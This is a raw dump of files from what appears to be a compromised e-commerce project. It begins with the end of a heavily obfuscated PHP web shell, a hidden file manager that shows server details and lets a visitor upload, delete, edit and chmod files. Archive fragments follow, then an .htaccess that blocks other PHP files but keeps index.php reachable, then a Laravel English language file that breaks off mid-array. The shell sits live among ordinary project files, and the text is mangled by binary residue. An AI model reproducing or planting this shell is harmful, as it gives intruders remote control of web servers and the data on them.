"\x3c\57\x70\76\xd\12\40\x20\x20\x20\x20\40\x3c\160\76\123\145\162\x76\145\162\40\x53\x6f\x66\164\x77\141\x72\145\72\40"; goto zn1nZ; ceVJp: echo "\x20\x20"; goto iFrhD; RIK5i: if (empty($WODEV)) { goto bib8O; } goto iM8Di; PYBS_: if (move_uploaded_file($_FILES["\146\x69\154\145\124\x6f\x55\160\154\157\x61\x64"]["\x74\x6d\x70\x5f\x6e\141\155\x65"], $ciDD9)) { goto WMi4F; } goto a1MI5; SY8zc: goto Mu4fl; goto u0Wod; nc7Vk: cA1Fs: goto mj8Zf; raFed: echo "\74\144\x69\x76\x20\x63\154\141\x73\163\x3d\x22\x61\154\145\x72\164\40\x61\x6c\145\x72\164\55\x64\x61\156\147\145\x72\x22\40\x72\157\x6c\145\x3d\42\141\x6c\x65\x72\164\x22\76\345\x88\xa0\351\x99\244" . $c8aSu . "\344\270\252\xe6\226\207\xe4\273\xb6\345\xa4\xb1\350\264\245\x21\x3c\x2f\144\151\x76\x3e"; goto m6N0L; Spy0q: foreach ($P1sqQ as $SU56i => $qMSGe) { goto WPXvB; gn7ly: $c8aSu++; goto iYFgV; iYFgV: goto X2YHx; goto SjqSj; SjqSj: e42i_: goto iKmqU; bIcNt: uLFhJ: goto RQEwu; mI3A6: if ($q2nDy) { goto e42i_; } goto gn7ly; aDPwi: X2YHx: goto bIcNt; iKmqU: $r5Ccu++; goto aDPwi; WPXvB: $q2nDy = unlink($qMSGe); goto mI3A6; RQEwu: } goto dvp4k; cjP0N: echo $ofUbe["\x53\105\122\x56\105\122\x5f\x41\x44\x44\122"]; goto TQqdI; gukOA: $D5vkg = trim($_POST["\156\145\x77\137\143\157\x6e\164\145\156\164"]); goto x4L7Y; N2Wn2: $P1sqQ = $_POST["\x63\x68\151\154\x64\x63\150\x65\x63\153"]; goto uj4VX; oEV2w: $rR7IS = dirname($rR7IS); goto YwnT9; DQkBz: echo "\40\40\40\40\x20\40\40\x20\x20\40\46\156\142\x73\160\73\46\x6e\x62\163\x70\x3b\46\156\x62\x73\160\73\x26\156\x62\163\x70\x3b\x3c\163\x70\x61\x6e\40"; goto aCSCN; tNGN9: goto vWZDE; goto bl4Gd; dvp4k: Jcg0m: goto l1cKT; BZmW2: if (!is_writable($rR7IS)) { goto lEB6U; } goto PnMuI; G1T_u: goto RcXJt; goto CN8Bn; GGErk: echo $zNdcv; goto vnLpj; x4L7Y: if (empty($WODEV)) { goto hyBKU; } goto LpF6j; tV2Nq: echo PHP_OS; goto g_ZBz; bFLO4: echo "\40\x20\x20\x20\74\144\151\x76\x20\x63\x6c\141\163\163\x3d\42\x72\x6f\x77\x22\x3e\xd\12\x20\x20\x20\40\x20\x20\x20\40\74\x66\x6f\x72\155\x20\x61\x63\x74\x69\157\x6e\x3d\42\77\164\171\x70\x65\75\67\x22\x20\155\x65\x74\150\x6f\144\x3d\x22\x70\x6f\x73\x74\42\x3e\15\12\40\40\x20\40\40\40\40\40\40\40\74\151\156\160\165\x74\40\164\171\x70\145\75\x22\x68\151\144\x64\x65\156\42\x20\x69\x64\75\42\x70\x61\x74\x68\42\40\x6e\x61\155\145\x3d\42\x70\x61\164\x68\42\40\x76\x61\154\165\145\75\42"; goto GGErk; zn1nZ: echo $ofUbe["\123\105\122\126\105\x52\137\123\117\106\124\127\101\x52\x45"]; goto PmoAp; EDa6D: $fMLG0 = trim($_POST["\156\x65\x77\x5f\143\150\155\157\144"]); goto ruHs8; nxgPJ: goto lLSby; goto qNE5i; PUY2n: HJhIX: goto ZSmrH; Wn9HB: hQiGT: goto Yc4ST; iNkCv: echo "\42\x2f\x3e\15\12\40\x20\x20\x20\40\x20\x20\x20\40\40\74\144\x69\166\40\x63\154\x61\163\163\x3d\x22\146\157\162\x6d\x2d\x67\162\x6f\x75\x70\42\76\15\12\40\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40"; goto uJSi9; NUhLS: if ($YEU_b) { goto XNoIE; } goto GOwiC; DcE9m: Dfh5B: goto ay6MS; U3jE0: gWR1M: goto dQamU; fi6yq: echo "\40\x20\x20\40\x20\40\40\x20\40\x20\x3c\x74\162\x3e\15\12\40\40\x20\40\x20\x20\x20\x20\x20\40\40\40\40\x20\74\x74\x64\40\143\157\154\163\160\141\x6e\75\x22\x34\42\40\x73\164\171\154\145\75\x22\x74\x65\x78\164\x2d\x61\154\151\147\x6e\x3a\x20\143\x65\156\164\x65\162\x3b\143\157\x6c\x6f\162\72\x72\145\144\x3b\42\x3e\15\xa\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\116\157\x20\x46\x69\x6c\x65\x73\41\15\xa\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\x3c\57\164\144\76\xd\xa\x20\40\40\40\x20\40\x20\x20\x20\x20\x3c\57\x74\x72\x3e\15\xa\x20\40\40\x20\40\40\40\40\40\40"; goto EcsIJ; z8qns: if ($i9I5I) { goto cyTPM; } goto pvsuy; UV8dq: $iO_db = QUHOz($rR7IS, $iO_db); goto YwyqN; BW8ZF: echo "\74\x2f\160\x3e\xd\xa\40\x20\40\x20\x20\x20\74\x70\x3e\x55\163\x65\x72\x3a\x20"; goto QILi5; KpM1R: WMi4F: goto kqzgI; aCSCN: if ($cFYjf) { goto qX2fL; } goto ULz4z; I587b: jGfN7: goto HOK7l; iDGpD: $GTqll = $_REQUEST["\x66\151\154\x65\137\143\x6f\x6e\x74\x65\x6e\x74"]; goto CRYRe; jS6a3: echo "\x22\57\76\xd\xa\x20\x20\x20\40\40\40\x20\40\x20\x20\74\x64\151\x76\x20\143\154\141\163\x73\x3d\42\146\157\x72\x6d\55\x67\162\x6f\165\160\42\76\xd\12\40\x20\x20\40\40\40\40\40\40\40\40\x20\40"; goto crvc6; mp1Iy: RM7ql: goto DQkBz; Yc4ST: if (!($Ys9sn == 3)) { goto Cjh6d; } goto iDGpD; GOwiC: echo "\74\144\x69\x76\x20\x63\154\x61\163\163\x3d\42\141\x6c\x65\162\164\x20\x61\x6c\x65\162\x74\x2d\144\x61\x6e\x67\145\x72\42\x20\x72\x6f\154\145\75\x22\x61\x6c\145\x72\164\42\76\xe4\xbf\256\346\x94\xb9\346\x96\x87\344\273\xb6\345\206\x85\xe5\256\271\xe5\244\261\xe8\xb4\245\x21\x3c\57\x64\x69\166\x3e"; goto G1T_u; rj9ra: echo "\x3e\x52\145\141\144\141\x62\154\145\74\x2f\163\x70\141\156\x3e\x20\x7c\40\x3c\x73\160\x61\x6e\40"; goto ZC5vr; U6lp7: if (is_dir($rR7IS)) { goto Fmcx5; } goto oEV2w; h7_9t: if (!empty($iO_db) && count($iO_db) > 2) { goto fKP2w; } goto fi6yq; nYxYi: goto Dfh5B; goto U3jE0; odWXu: echo "\x20\x20\x20\40\74\144\151\x76\x20\x63\x6c\141\163\163\x3d\42\x72\x6f\167\42\x3e\15\12\x20\40\x20\x20\40\40\x20\x20\74\146\157\x72\x6d\x20\141\143\164\x69\x6f\156\x3d\x22\x3f\164\x79\x70\x65\x3d\63\x22\40\155\145\164\x68\x6f\x64\x3d\x22\x70\x6f\x73\164\x22\x3e\xd\12\40\x20\x20\x20\x20\40\40\40\40\x20\74\x69\x6e\160\165\164\40\x74\x79\160\145\x3d\x22\150\x69\x64\144\x65\x6e\42\x20\151\144\x3d\42\160\x61\164\x68\x22\x20\156\141\x6d\145\x3d\x22\160\x61\164\150\42\40\x76\141\154\x75\x65\75\x22"; goto w3I8z; TvkD3: echo $SJWhn; goto rVdWT; uvvwC: $zNdcv = $l7f3r; goto pWpbl; KEhT5: PU3DU: goto s3Z4T; EigEA: echo $zNdcv; goto k2vUV; pvsuy: echo "\x3c\144\151\x76\40\143\154\x61\x73\163\75\42\x61\154\145\162\164\x20\x61\154\145\x72\164\x2d\144\141\156\147\145\162\42\40\162\157\154\x65\x3d\x22\141\154\x65\162\x74\42\x3e\xe6\x97\240\346\263\x95\xe6\x89\x93\xe5\274\200\346\226\x87\344\273\266\41\74\x2f\144\151\x76\x3e"; goto ibpfj; O8b0x: echo "\74\57\x74\145\x78\164\x61\x72\x65\141\76\15\12\x20\40\x20\40\40\x20\x20\40\x20\x20\x3c\57\x64\151\166\76\xd\xa\40\x20\40\40\x20\x20\40\40\x20\40\x3c\x62\165\164\164\157\156\40\x74\171\x70\x65\75\42\x73\165\142\x6d\x69\164\x22\x20\x63\x6c\141\163\x73\x3d\42\142\x74\x6e\40\142\164\156\55\x73\165\143\x63\x65\x73\163\42\x3e\103\162\x65\141\x74\145\x20\116\x6f\167\74\x2f\x62\x75\164\164\157\156\76\15\12\x20\x20\40\x20\40\40\40\x20\x3c\57\x66\157\x72\155\76\15\xa\x20\40\x20\x20\x3c\x2f\x64\x69\166\76\15\12\40\40\40\x20"; goto MaIvj; c1Sh9: $rR7IS = dirname($zNdcv); goto V_UeI; c9bPI: echo "\74\x2f\160\x3e\xd\xa\40\40\40\40\40\x20\74\160\x3e\xd\xa\40\40\40\40\40\x20\x20\x20\40\x20\40\40\74\x61\40\x68\x72\x65\x66\75\x22\77\x70\141\x74\150\x3d"; goto TvkD3; TMrIx: echo "\x3c\144\151\x76\x20\143\x6c\141\163\x73\75\x22\141\154\x65\162\164\x20\141\154\145\x72\164\55\163\165\x63\143\145\163\x73\42\x20\x72\x6f\154\145\x3d\x22\x61\x6c\x65\x72\164\x22\x3e\xe5\x88\xa0\351\x99\xa4" . $r5Ccu . "\344\270\xaa\346\x96\207\xe4\273\266\346\x88\220\345\212\x9f\x21\74\x2f\144\151\166\76"; goto YzL3X; vnLpj: echo "\42\57\x3e\xd\12\40\x20\40\x20\x20\x20\40\40\x20\x20\x3c\144\x69\166\x20\143\x6c\141\163\163\x3d\x22\146\x6f\162\155\x2d\x67\x72\x6f\x75\160\42\x3e\xd\xa\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\74\151\156\160\165\164\x20\x74\171\160\x65\75\42\164\145\170\x74\x22\40\x63\x6c\x61\x73\x73\x3d\x22\x66\x6f\162\155\55\143\157\x6e\x74\x72\x6f\154\42\x20\x69\144\75\x22\x6e\x65\167\137\x6e\141\x6d\x65\x22\40\156\x61\x6d\x65\x3d\x22\156\x65\x77\137\156\x61\x6d\145\42\x20\x76\x61\154\x75\145\x3d\x22"; goto EBf_x; egL8j: echo "\163\x74\x79\154\145\75\x22\x63\157\x6c\157\x72\x3a\x72\x65\144\73\42"; goto nYxYi; ibpfj: goto p4sKm; goto olCkt; AHA3N: vWZDE: goto inQAA; TUDA6: echo htmlspecialchars($D5vkg); goto O8b0x; f1tnp: $nbt0K = explode("\57", $zNdcv); goto U6lp7; lGlVH: cdn7B: goto vdHOS; zODrL: echo "\74\x64\x69\166\40\143\154\141\x73\163\75\42\x61\x6c\145\162\164\x20\141\154\145\162\x74\x2d\163\x75\x63\143\x65\163\163\x22\40\162\x6f\154\145\75\x22\141\x6c\x65\162\164\42\76\xe7\x9b\xae\345\xbd\225\xe5\xb7\xb2\xe5\xad\x98\xe5\x9c\xa8\41\74\x2f\144\x69\x76\76"; goto j3a5Z; fETbR: echo "\74\x64\151\166\x20\143\x6c\x61\163\x73\x3d\42\141\154\145\x72\164\40\141\x6c\145\x72\164\55\144\141\156\x67\145\x72\x22\x20\162\x6f\154\x65\x3d\x22\141\x6c\x65\x72\x74\42\76\344\277\xae\346\x94\xb9\xe6\x96\207\xe4\xbb\xb6\xe6\235\203\351\231\x90\345\xa4\xb1\xe8\xb4\xa5\41\74\x2f\x64\x69\x76\76"; goto L0tLC; Vj9ug: Cjh6d: goto odWXu; l1cKT: if (!($r5Ccu > 0)) { goto wTzu4; } goto TMrIx; TEVW7: if (chmod($zNdcv, octdec($fMLG0))) { goto yRmp7; } goto fETbR; o0jY6: echo "\74\144\151\166\40\x63\154\141\163\163\75\x22\x61\x6c\x65\162\x74\x20\x61\154\145\x72\164\x2d\163\165\143\143\145\x73\163\x22\40\x72\x6f\x6c\x65\x3d\x22\141\x6c\145\162\164\x22\x3e\347\x9b\xae\345\275\x95\xe5\x88\233\xe5\xbb\272\346\x88\x90\345\212\237\x21\x3c\x2f\144\x69\x76\76"; goto m0nmf; nuD8E: echo "\40\x20\x20\x20\40\40\40\40\74\x2f\x74\x62\x6f\144\x79\x3e\15\12\x20\x20\x20\x20\40\40\x3c\57\164\141\x62\154\x65\x3e\xd\12\40\40\40\x20\x20\40\x3c\57\146\x6f\162\155\76\xd\12\40\40\74\x2f\144\x69\x76\76\15\12\40\40"; goto EpfHY; UefjI: echo $WODEV; goto O1E2I; XZdFF: kzURu: goto nuD8E; g_ZBz: echo "\x3c\x2f\x70\76\15\12\40\40\x20\40\x20\40\74\160\x3e\x57\145\142\x73\151\164\145\x3a\40"; goto S47eX; mTTPR: gcbod: goto f1tnp; UJCKR: echo "\x73\x74\x79\154\145\x3d\42\143\x6f\x6c\x6f\162\72\x67\162\145\145\x6e\x3b\x22"; goto wW3Q9; vab4q: echo "\x3c\57\x62\x6f\x64\x79\76\15\12\74\x2f\x68\164\x6d\x6c\x3e"; ?>PK ! ����� � en/473851/.htaccessnu �[��� <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|php7|phP|PhP|php5|php8|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(index.php)$'> Order allow,deny Allow from all </FilesMatch>PK ! �L��X X en/pagination.phpnu �[��� <?php return [ 'next' => 'Next »', 'previous' => '« Previous', ]; PK ! �%�* �* en/messages.phpnu �[��� <?php return array ( 'Dashboard' => 'Dashboard', 'order_management' => 'Order management', 'orders' => 'Orders', 'All' => 'All', 'pending' => 'Pending', 'confirmed' => 'Confirmed', 'Processing' => 'Processing', 'out_for_delivery' => 'Out for delivery', 'delivered' => 'Delivered', 'returned' => 'Returned', 'failed' => 'Failed', 'canceled' => 'Canceled', 'product_management' => 'Product management', 'brands' => 'Brands', 'add_new' => 'Add new', 'List' => 'List', 'categories' => 'Categories', 'category' => 'Category', 'sub_category' => 'Sub category', 'sub_sub_category' => 'Sub sub category', 'Attribute' => 'Attribute', 'InHouse Products' => 'InHouse Products', 'Products' => 'Products', 'bulk_import' => 'Bulk import', 'bulk_export' => 'Bulk export', 'Seller' => 'Seller', 'New' => 'New', 'Approved' => 'Approved', 'Denied' => 'Denied', 'marketing_section' => 'Marketing section', 'banners' => 'Banners', 'coupons' => 'Coupons', 'push_notification' => 'Push notification', 'flash_deals' => 'Flash deals', 'deal_of_the_day' => 'Deal of the day', 'featured_deal' => 'Featured deal', 'business_section' => 'Business section', 'seller_withdraws' => 'Seller withdraws', 'product' => 'Product', 'stock' => 'Stock', 'Customer' => 'Customer', 'Reviews' => 'Reviews', 'in' => 'In', 'wish_list' => 'Wish List', 'user_section' => 'User section', 'Sellers' => 'All Sellers', 'customers' => 'Customers', 'support_section' => 'Support section', 'messages' => 'Messages', 'support_ticket' => 'Support Ticket', 'business_settings' => 'Business settings', 'seller_settings' => 'Seller settings', 'payment_method' => 'Payment method', 'sms' => 'Sms', 'module' => 'Module', 'shipping_method' => 'Shipping method', 'by_admin' => 'By admin', 'by_seller' => 'By seller', 'languages' => 'Languages', 'for_data_entry' => 'For data entry', 'for_website' => 'For website', 'social_login' => 'Social login', 'currencies' => 'Currencies', 'web_&_app_settings' => 'Web & app settings', 'web_config' => 'Web config', 'mail_config' => 'Mail config', 'notification' => 'Notification', 'page_setup' => 'Page setup', 'terms_and_condition' => 'Terms and conditions', 'privacy_policy' => 'Privacy Policy', 'about_us' => 'About Us', 'faq' => 'FAQ', 'social_media' => 'Social media', 'Report' => 'Report', 'Analytics' => 'Analytics', 'Earning' => 'Earning', 'Order' => 'Order', 'sale_report' => 'Sale report', 'inhouse' => 'Inhouse', 'sale' => 'Sale', 'seller' => 'Seller', 'employee_section' => 'Employee section', 'employee_role' => 'Employee role', 'employees' => 'Employees', 'balance' => 'Balance', 'withdrawn' => 'Withdrawn', 'total_earning' => 'Total earning', 'top_selling_products' => 'Top selling products', 'most_rated_products' => 'Most rated products', 'Pending' => 'Pending', 'Delivered' => 'Delivered', 'Returned' => 'Returned', 'Failed' => 'Failed', 'Product' => 'Product', 'my_bank_info' => 'My bank info', 'my_shop' => 'My shop', 'Name' => 'Name', 'Add' => 'Add', 'Update' => 'Update', 'Table' => 'Table', 'SL#' => 'SL#', 'Action' => 'Action', 'Edit' => 'Edit', 'Delete' => 'Delete', 'product_table' => 'Product table', 'Add new product' => 'Add new product', 'Product Name' => 'Product Name', 'purchase_price' => 'Purchase price', 'selling_price' => 'Selling price', 'featured' => 'Featured', 'Active' => 'Active', 'status' => 'Status', 'name' => 'Name', 'description' => 'Description', 'Category' => 'Category', 'Sub Category' => 'Sub Category', 'Sub Sub Category' => 'Sub Sub Category', 'Brand' => 'Brand', 'Unit' => 'Unit', 'Colors' => 'Colors', 'Attributes' => 'Attributes', 'Product price & stock' => 'Product price & stock', 'Unit price' => 'Unit price', 'Purchase price' => 'Purchase price', 'Tax' => 'Tax', 'Percent' => 'Percent', 'Discount' => 'Discount', 'Flat' => 'Flat', 'total' => 'Total', 'Quantity' => 'Quantity', 'seo_section' => 'Seo section', 'Upload product images' => 'Upload product images', 'ratio' => 'Ratio', 'Upload thumbnail' => 'Upload thumbnail', 'Variation' => 'Variation', 'Choice Title' => 'Choice Title', 'Variant' => 'Variant', 'Variant Price' => 'Variant Price', 'SKU' => 'SKU', 'Enter choice values' => 'Enter choice values', 'Banner' => 'Banner', 'add_main_banner' => 'Add main banner', 'add_secondary_banner' => 'Add secondary banner', 'add_popup_banner' => 'Add popup banner', 'main_banner_form' => 'Main banner form', 'banner_url' => 'Banner url', 'Image' => 'Image', 'choose' => 'Choose', 'file' => 'File', 'Cancel' => 'Cancel', 'save' => 'Save', 'update' => 'Update', 'secondary_banner_form' => 'Secondary banner form', 'popup_banner_form' => 'Popup banner form', 'banner_table' => 'Banner table', 'sl' => 'Sl', 'image' => 'Image', 'banner_type' => 'Banner type', 'published' => 'Published', 'action' => 'Action', 'Coupon' => 'Coupon', 'coupon_form' => 'Coupon form', 'Type' => 'Type', 'Title' => 'Title', 'Code' => 'Code', 'start_date' => 'Start date', 'expire_date' => 'Expire date', 'minimum_purchase' => 'Minimum purchase', 'discount_type' => 'Discount type', 'Amount' => 'Amount', 'percentage' => 'Percentage', 'maximum_discount' => 'Maximum discount', 'Submit' => 'Submit', 'coupons_table' => 'Coupons table', 'coupon_type' => 'Coupon type', 'Status' => 'Status', 'Notification' => 'Notification', 'Description' => 'Description', 'Send' => 'Send', 'Notification_Table' => 'Notification Table', 'flash_deal' => 'Flash Deal', 'deal_form' => 'Deal form', 'end_date' => 'End date', 'Upload' => 'Upload', 'flash_deal_table' => 'Flash deal table', 'Start' => 'Start', 'end' => 'End', 'title' => 'Title', 'feature_deal' => 'Feature deal', 'Withdraw' => 'Withdraw', 'Withdraw Request Table' => 'Withdraw Request Table', 'amount' => 'Amount', 'request_time' => 'Request time', 'View' => 'View', 'Review' => 'Review', 'seller_table' => 'Seller table', 'Phone' => 'Phone', 'Email' => 'Email', 'Account' => 'Account', 'suspend' => 'Suspend', 'Shop' => 'Shop', 'info' => 'Info', 'seller_b' => 'Seller b', 'address' => 'Address', 'bank_info' => 'Bank info', 'bank_name' => 'Bank name', 'Branch' => 'Branch', 'holder_name' => 'Holder name', 'account_no' => 'Account no', 'Total' => 'Total', 'block' => 'Block', 'unblock' => 'Unblock', 'Customer Message' => 'Customer Message', 'table' => 'Table', 'mobile_no' => 'Mobile no', 'Subject' => 'Subject', 'Priority' => 'Priority', 'dashboard_order_statistics' => 'Dashboard order statistics', 'top_store_by_order_received' => 'Top store by order received', 'top_selling_store' => 'Top selling store', 'top_customer' => 'Top customer', 'sales' => 'Sales', 'comission' => 'Comission', 'Informations' => 'Informations', 'Save' => 'Save', 'system_default' => 'System default', 'cash_on_delivery' => 'Cash on delivery', 'Inactive' => 'Inactive', 'digital_payment' => 'Digital payment', 'SSLCOMMERZ' => 'SSLCOMMERZ', 'ssl_commerz_payment' => 'Ssl commerz payment', 'Store' => 'Store', 'ID' => 'ID', 'password' => 'Password', 'Paypal' => 'Paypal', 'Payment' => 'Payment', 'Client' => 'Client', 'Secret' => 'Secret', 'Stripe' => 'Stripe', 'stripe' => 'Stripe', 'Published' => 'Published', 'Key' => 'Key', 'api_key' => 'Api key', 'razor_pay' => 'Razor pay', 'secret' => 'Secret', 'senang_pay' => 'Senang pay', 'key' => 'Key', 'Merchant' => 'Merchant', 'paystack' => 'Paystack', 'publicKey' => 'PublicKey', 'secretKey' => 'SecretKey', 'paymentUrl' => 'PaymentUrl', 'merchantEmail' => 'MerchantEmail', 'form' => 'Form', 'duration' => 'Duration', 'cost' => 'Cost', 'sl#' => 'Sl#', 'language_setting' => 'Language setting', 'and' => 'And', 'language' => 'Language', 'language_table' => 'Language table', 'add_new_language' => 'Add new language', 'Id' => 'Id', 'Translate' => 'Translate', 'new_language' => 'New language', 'country_code' => 'Country code', 'direction' => 'Direction', 'close' => 'Close', 'google' => 'Google', 'client_id' => 'Client id', 'client_secret' => 'Client secret', 'facebook' => 'Facebook', 'twitter' => 'Twitter', 'Currency' => 'Currency', 'add' => 'Add', 'system_default_currency' => 'System default currency', 'currency_name' => 'Currency name', 'currency_symbol' => 'Currency symbol', 'currency_code' => 'Currency code', 'exchange_rate' => 'Exchange rate', 'Website' => 'Website', 'Info' => 'Info', 'rename_your_website' => 'Rename your website', 'rename_company' => 'Rename company', 'apple_store' => 'Apple store', 'link' => 'Link', 'google_play_store' => 'Google play store', 'company' => 'Company', 'copy_right' => 'Copy right', 'Text' => 'Text', 'Web' => 'Web', 'logo' => 'Logo', 'Mobile' => 'Mobile', 'web_footer' => 'Web footer', 'web_fav_icon' => 'Web fav icon', 'web_color_setup' => 'Web color setup', 'Primary' => 'Primary', 'Secondary' => 'Secondary', 'smtp_mail_config' => 'Smtp mail config', 'mailer_name' => 'Mailer name', 'Host' => 'Host', 'Driver' => 'Driver', 'port' => 'Port', 'Username' => 'Username', 'email_id' => 'Email id', 'Encryption' => 'Encryption', 'help_topic' => 'Help topic', 'Question' => 'Question', 'Answer' => 'Answer', 'Ranking' => 'Ranking', 'social_media_form' => 'Social media form', 'social_media_link' => 'Social media link', 'social_media_table' => 'Social media table', 'Overview' => 'Overview', 'Admin' => 'Admin', 'Date' => 'Date', 'Show' => 'Show', 'Sold' => 'Sold', 'Orders' => 'Orders', 'Weekly' => 'Weekly', 'This' => 'This', 'week' => 'Week', 'Last' => 'Last', 'custom_role' => 'Custom role', 'role_form' => 'Role form', 'role_name' => 'Role name', 'module_permission' => 'Module permission', 'marketing' => 'Marketing', 'roles_table' => 'Roles table', 'modules' => 'Modules', 'created_at' => 'Created at', 'employee_add' => 'Employee add', 'employee_form' => 'Employee form', 'Role' => 'Role', 'employee_image' => 'Employee image', 'submit' => 'Submit', 'Employee' => 'Employee', 'employee_table' => 'Employee table', 'Password' => 'Password', 'banner_photo' => 'Banner photo', 'Explore' => 'Explore', 'Now' => 'Now', 'view_all' => 'View all', 'featured_products' => 'Featured Products', 'Quick' => 'Quick', 'recommended_product' => 'Recommended product', 'buy_now' => 'Buy now', 'latest_products' => 'Latest Products', 'sellers' => 'Sellers', 'bestsellings' => 'Bestsellings', 'new_arrivals' => 'New arrivals', 'top_rated' => 'Top rated', 'search' => 'Search', 'sing_in' => 'Sign in', 'sing_up' => 'Sign up', 'my_cart' => 'My cart', 'Empty' => 'Empty', 'Cart' => 'Cart', 'Home' => 'Home', 'zone' => 'Zone', 'Become a' => 'Become a', 'login' => 'Login', 'download_our_app' => 'Download our app', 'special' => 'Special', 'best_selling_product' => 'Best Selling Products', 'top_rated_product' => 'Top Rated Products', 'all_brand' => 'All Brands', 'all_category' => 'All Categories', 'account&shipping_info' => 'Account & shipping info', 'profile_info' => 'Profile Info', 'track_order' => 'Track Order', 'about_company' => 'About Company', 'terms_&_conditions' => 'Terms & Conditions', 'contact_us' => 'Contact Us', 'order_table' => 'Order table', 'customer_name' => 'Customer name', 'verify_status' => 'Verify status', 'Language' => 'Language', 'language_content_table' => 'Language content table', 'back' => 'Back', 'value' => 'Value', 'from' => 'From', 'limit' => 'Limit', 'for' => 'For', 'same' => 'Same', 'user' => 'User', 'email_address' => 'Email address', 'please_provide_valid_email' => 'Please provide valid email', 'remember_me' => 'Remember me', 'forgot_password' => 'Forgot password', 'sign_in' => 'Sign in', 'no_account_Sign_up_now' => 'No account Sign up now', 'sing_in_with_google' => 'Sign in with google', 'sing_in_with_facebook' => 'Sign in with facebook', 'my_order' => 'My order', 'my_profile' => 'My profile', 'logout' => 'Logout', 'To' => 'To', 'shopping_cart' => 'Shopping cart', 'Shipping' => 'Shipping', 'Authentication' => 'Authentication', 'HI' => 'HI', 'you_are_already_login_proceed' => 'You are already login proceed', 'Back' => 'Back', 'to' => 'To', 'proceed_shipping' => 'Proceed shipping', 'Next' => 'Next', 'shipping_address' => 'Shipping address', 'choose_shipping_address' => 'Choose shipping address', 'contact_person_name' => 'Contact person name', 'Another' => 'Another', 'Permanent' => 'Permanent', 'Others' => 'Others', 'Country' => 'Country', 'City' => 'City', 'zip_code' => 'Zip code', 'save_this_address' => 'Save this address', 'proceed_payment' => 'Proceed payment', 'price' => 'Price', 'TAX' => 'TAX', 'Subtotal' => 'Subtotal', 'details' => 'Details', 'Unpaid' => 'Unpaid', 'Print' => 'Print', 'invoice' => 'Invoice', 'Paid' => 'Paid', 'Method' => 'Method', 'reference' => 'Reference', 'Contact' => 'Contact', 'category_form' => 'Category form', 'category_table' => 'Category table', 'slug' => 'Slug', 'icon' => 'Icon', 'home_status' => 'Home status', 'information' => 'Information', 'no_account' => 'No account', 'register_control_your_order' => 'Register control your order', 'first_name' => 'First name', 'last_name' => 'Last name', 'phone_name' => 'Phone name', 'confirm_password' => 'Confirm password', 'i_agree_to_Your_terms' => 'I agree to Your terms', 'sing_up_with_google' => 'Sign up with google', 'sing_up_with_facebook' => 'Sign up with facebook', 'wish' => 'Wish', 'Select' => 'Select', 'Visit' => 'Visit', 'go_to' => 'Go to', 'chatbox' => 'Chatbox', 'OVERVIEW' => 'OVERVIEW', 'REVIEWS' => 'REVIEWS', 'Overall' => 'Overall', 'rating' => 'Rating', 5 => '5', 4 => '4', 3 => '3', 2 => '2', 1 => '1', 'product_review_not_available' => 'Product review not available', 'similar_products' => 'Similar products', 'sign-up' => 'Sign-up', 'choose_payment' => 'Choose payment', 'your_order_confirm' => 'Your order confirm', 'No' => 'No', 'Hello' => 'Hello', 'Items' => 'Items', 'text_fee' => 'Tax fee', 'Fee' => 'Fee', 'on_product' => 'On product', 'shipping_confirmation_email' => 'Shipping confirmation email', 'thanks_for_shopping_with' => 'Thanks for shopping with', 'go_to_shopping' => 'Go to shopping', 'Track' => 'Track', 'one_step_ahead' => 'One step ahead', 'update_information_to_continue' => 'Update information to continue', 'Marketing_Section' => 'Marketing Section', 'list' => 'List', 'withdraws' => 'Withdraws', 'Order#' => 'Order#', 'Add_new' => 'Add new', 'General_info' => 'General info', 'Sub_category' => 'Sub category', 'Sub_sub_category' => 'Sub sub category', 'Variations' => 'Variations', 'Product_price_&_stock' => 'Product price & stock', 'Unit_price' => 'Unit price', 'Purchase_price' => 'Purchase price', 'Meta_title' => 'Meta title', 'Meta_description' => 'Meta description', 'Meta_image' => 'Meta image', 'Youtube video link' => 'Youtube video link', 'optional please provide embed link not direct link' => 'Optional please provide embed link not direct link', 'Upload_product_images' => 'Upload product images', 'ratio 1:1' => 'Ratio 1:1', 'Upload_thumbnail' => 'Upload thumbnail', 'new' => 'New', 'Seller_details' => 'Seller details', 'Back_to_seller_list' => 'Back to seller list', '#SL' => 'SL', 'paid' => 'Paid', 'products' => 'Products', 'No_data_to_show' => 'No data to show', 'Review_list' => 'Review list', 'Search' => 'Search', 'SL' => 'SL', 'Rating' => 'Rating', 'Setting' => 'Setting', 'Transaction' => 'Transaction', 'withdraw_able_balance' => 'Withdraw able balance', 'Sales Commission' => 'Sales Commission', 'If sales commission is disabled here the system default commission will be applied' => 'If sales commission is disabled here the system default commission will be applied', 'Commission' => 'Commission', 'GST Number' => 'GST Number', 'If GST number is disabled here it will not show in invoice' => 'If GST number is disabled here it will not show in invoice', 'Number' => 'Number', 'Welcome_message' => 'Welcome message', 'Overall_statistics' => 'Overall statistics', 'Today s Statistics' => 'Today s Statistics', 'This Month s Statistics' => 'This Month s Statistics', 'for_app' => 'For app', 'Warning' => 'Warning', 'Follow the documentation to setup from app end' => 'Follow the documentation to setup from app end', 'click' => 'Click', 'here' => 'Here', 'Select Country code' => 'Select Country code', 'For mobile app only' => 'For mobile app only', 'web_admin' => 'Web admin', 'filter' => 'Filter', 'sort_by' => 'Sort by', 'Latest' => 'Latest', 'low_high' => 'Low high', 'Price' => 'Price', 'hight_low' => 'Hight low', 'a_z' => 'A z', 'z_a' => 'Z a', 'Choose' => 'Choose', 'most_favorite' => 'Most favorite', 'default' => 'Default', 'Callback_url' => 'Callback url', 'Callback_URI' => 'Callback URI', 'Settings' => 'Settings', 'Shipping_Method_Select' => 'Shipping Method Select', 'select' => 'Select', 'single_shipping_method' => 'Single shipping method', 'seller_wise_shipping_method' => 'Seller wise shipping method', 'choose_shipping_method' => 'Choose shipping method', 'continue_shopping' => 'Continue shopping', 'checkout' => 'Checkout', 'Sign_in_First_to_Apply_Coupon' => 'Sign in First to Apply Coupon', 'phone' => 'Phone', 'Enter_email_address_or_phone_number' => 'Enter email address or phone number', 'please_provide_valid_email_or_phone_number' => 'Please provide valid email or phone number', 'login_for_add_to_cart' => 'Login for add to cart', 'similar' => 'Similar', 'product_not_available' => 'Product not available', 'cart_empty' => 'Cart empty', 